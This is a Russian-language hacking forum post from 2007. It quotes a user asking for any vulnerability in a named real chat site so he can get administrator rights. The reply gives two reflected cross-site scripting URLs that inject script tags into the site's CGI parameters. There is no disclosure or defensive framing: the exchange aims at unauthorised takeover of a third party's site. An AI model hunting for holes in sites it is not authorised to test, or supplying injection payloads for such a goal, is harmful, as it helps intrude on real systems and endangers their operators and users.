15.04.2007, 06:43
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079
Репутация:
137
|
|
Сообщение от YARUS
http://chat.kursknet.ru/ оч нужно найти уязвимость.....свох сил нехвотает пока....нужно найти любые дыры чтоб палучить прва администратора или хотяб админа KASH. Заранее блогодарен.
РЕГИСТРАЦИЯ ЗАКРЫТА!
Тестовый логин нужен.
Думаю 4 пунктом в образце заявки нужно сделать тестовые логин/пароль, очень часто нужны.
Без логина выудил только пассивную XSS -
Код:
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=send_pwd&name="><script>alert("XSS")</script>
Апдейт:
еще XSS
Код:
http://chat.kursknet.ru/cgi-bin/chat/sub.cgi?action=userinfo&infoabout="><script>alert("XSS")</script>
Последний раз редактировалось Horsekiller; 15.04.2007 в 17:07..
|
|
|